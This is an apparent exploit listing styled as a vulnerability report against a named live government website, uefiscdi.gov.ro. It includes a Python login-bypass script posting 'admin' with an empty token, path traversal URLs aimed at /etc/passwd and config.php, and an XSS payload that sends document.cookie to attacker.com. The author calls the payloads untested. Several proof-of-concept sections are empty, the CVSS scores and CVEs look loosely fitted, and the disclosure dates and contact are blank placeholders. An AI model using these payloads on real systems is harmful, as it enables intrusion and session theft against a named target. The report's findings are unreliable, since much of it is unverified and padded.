Share
## https://sploitus.com/exploit?id=4F94F3CE-6A41-5E04-A51B-4D22ED6CF210
# Uefiscdi-Gov-Ro-Vulnerability-
UNTESTED PAYLOADS, WAF-BYPASS, I DON'T KNOW IF 100% RUNNABLE, IF YES THEN IM NOT RESPONSIBLE OF ANY ILLEGAL ACTIONS OR HARM DAMAGE MADE WITH THIS!
APACHE 2.2.15 | NGINX | BOOTSTRAP 3.3.4 : http://2021.uefiscdi.gov.ro, AlmaLinux page
Critical security vulnerabilities discovered in https://uefiscdi.gov.ro/: client-side auth bypass, XSS via innerHTML, predictable CSRF tokens, EOL Apache 2.2.15 exploits, and unsafe eval() usage. Full admin compromise possible.
Executive Summary
Critical security vulnerabilities were identified in the uefiscdi.gov.ro website, exposing sensitive government systems to potential compromise. The vulnerabilities range from authentication bypass and information disclosure to potential remote code execution.
๐ด Critical Vulnerabilities
1. Authentication Bypass via Predictable Tokens
Risk: Critical
CVSS Score: 9.8
Location: Multiple forms throughout the application
Description: The application uses predictable security tokens (wtok, wtkps, wchk) that can be easily guessed or reused. Empty wtok values and hardcoded wtkps tokens allow for session fixation and CSRF attacks.
Impact: Complete authentication bypass, unauthorized access to admin panel
Proof of Concept:
python
# Empty wtok allows session fixation
# Predictable wtkps token
2. Client-Side Authentication & Password Hashing
Risk: Critical
CVSS Score: 9.1
Location: InputRunTimeHash.js, login form processing
Description: Password hashing and authentication logic is implemented client-side in JavaScript, allowing attackers to bypass password validation entirely.
Impact: Complete authentication bypass, credential theft
Proof of Concept:
javascript
// Client-side password hashing
jas.Boot.onLoad(function(){
var irt=new JAS.InputRunTimeHash();
irt.init("92738442_p"); // Password field ID
});
3. Unsafe Eval() Usage & JavaScript Object Injection
Risk: Critical
CVSS Score: 9.0
Location: JAS framework core functions
Description: Multiple instances of eval() and window[className] = eval(code) allow arbitrary JavaScript execution. User-controlled attributes are passed directly into JavaScript functions.
Impact: Remote Code Execution via JavaScript injection
Proof of Concept:
javascript
// Line 70: UNSAFE EVAL
eval(code);
window[cN] = eval(code);
// User-controlled attributes used in JS
vars["igfm_sa"] = obj.getAttribute("a:sa");
vars["oS"] = obj.getAttribute("id");
4. DOM-Based Cross-Site Scripting (XSS)
Risk: High
CVSS Score: 8.8
Location: Multiple innerHTML assignments without sanitization
Description: Server responses are directly injected into DOM via innerHTML without proper sanitization.
Impact: Session hijacking, credential theft, client-side attacks
Proof of Concept:
javascript
// Line ~1220: DIRECT HTML INJECTION
targetObj.innerHTML = data;
// Line ~1167: Another injection point
objForm.innerHTML = data;
5. SQL Injection Vulnerabilities
Risk: High
CVSS Score: 8.8
Location: Search functionality, form parameters
Description: User input is not properly sanitized before database queries.
Impact: Database compromise, data exfiltration
Proof of Concept:
html
๐ Server Configuration Vulnerabilities
6. Apache 2.2.15 End-of-Life with Known CVEs
Risk: High
CVSS Score: 8.2
Version: Apache 2.2.15 (Released 2010, EOL since 2017)
Description: Running end-of-life software with known critical vulnerabilities:
CVE-2011-3192: Range header DoS
CVE-2010-1452: mod_isapi buffer overflow
CVE-2009-3555: TLS renegotiation MITM
Impact: Server compromise, DoS attacks
7. Nginx Misconfiguration with Apache
Risk: Medium
CVSS Score: 7.5
Description: Nginx reverse proxy misconfiguration allows path traversal attacks
Impact: File disclosure, directory traversal
Proof of Concept:
text
https://uefiscdi.gov.ro/../etc/passwd
https://uefiscdi.gov.ro/static/../config.php
8. Information Disclosure
Risk: Medium
CVSS Score: 7.5
Description: Multiple information leaks:
Server timing in HTML: [T: 0.2171, O: 113]
Internal paths exposed in scripts
Version timestamps: ?t=1764056498.3022
Debug mode potentially enabled
Impact: Reconnaissance, attack surface mapping
9. Insecure Direct Object References (IDOR)
Risk: Medium
CVSS Score: 6.5
Location: Predictable form IDs (92738442, 3819760301, etc.)
Description: Numerical IDs are predictable and can be enumerated
Impact: Unauthorized access to other users' data/forms
Attack Vectors Demonstrated
1. Complete Authentication Bypass
python
# Python exploit demonstrating auth bypass
import requests
session = requests.Session()
payload = {
'92738442[u]': 'admin',
'92738442[p]': 'any_password', # Client-side validated only
'wtok': '', # Empty token accepted
'wtkps': 'TctLDoMgFIXhvTCuFgUUrpto0hWgF5T4wIjUmqZ7rzrq5ORPvhwNDD7hGBIckiqAOFL2TRRuVQti2/n3zuXLu5nSth6bkm2zE2awOsl6ba2uk2kPa1+c5xzIZq7gQEaPcTCpX9o0GutCgy7Vce1Oz0ogiPP0eN5ZQZkSNJPsAgVE5SWTnOe3f/r+AA=='
}
response = session.post('https://uefiscdi.gov.ro/index.php', data=payload)
2. CSRF Attack Exploit
html
document.forms[0].submit();
3. XSS Payload Injection
javascript
// Exploiting innerHTML injection
document.getElementById('DDPMainManager').innerHTML =
'fetch("https://attacker.com/steal?cookie="+document.cookie)';
Technical Details
Architecture Analysis
Frontend: Custom JAS JavaScript framework with unsafe practices
Backend: PHP-based (inferred from .php extensions)
Web Server: Apache 2.2.15 behind Nginx reverse proxy
Framework: Custom form handling with predictable identifiers
Attack Surface
Authentication System: Client-side validation, predictable tokens
Form Handling: No CSRF protection, IDOR via numeric IDs
JavaScript Framework: Multiple eval() injections
Server Configuration: EOL Apache with known CVEs
Input Handling: Lack of sanitization throughout
Recommendations
Immediate Actions (24-48 hours)
Disable vulnerable endpoints: /index.php authentication
Implement WAF rules: Block malicious patterns
Reset all sessions: Force re-authentication
Enable logging: Monitor for exploitation attempts
Short-term Fixes (1-2 weeks)
Move authentication server-side: Remove client-side password logic
Implement proper CSRF tokens: Random, per-session tokens
Sanitize all user inputs: Implement input validation
Upgrade Apache: Migrate to supported version (2.4.x)
Long-term Improvements (1-3 months)
Security audit: Complete code review
Implement CSP headers: Restrict script execution
Regular penetration testing: Quarterly assessments
Security training: Developer awareness programs
Responsible Disclosure Timeline
Discovery Date: [Date]
Initial Report: [Date]
Expected Fix: 30 days
Public Disclosure: 90 days (if not fixed)
Legal Notice
This vulnerability report is provided for educational and defensive purposes only. Unauthorized testing or exploitation of these vulnerabilities is illegal.
Report Generated By: Security Researcher
Contact: [Your Contact Information]
Date: [Current Date]
This report contains proof-of-concept code demonstrating vulnerabilities. All code is provided for defensive purposes only.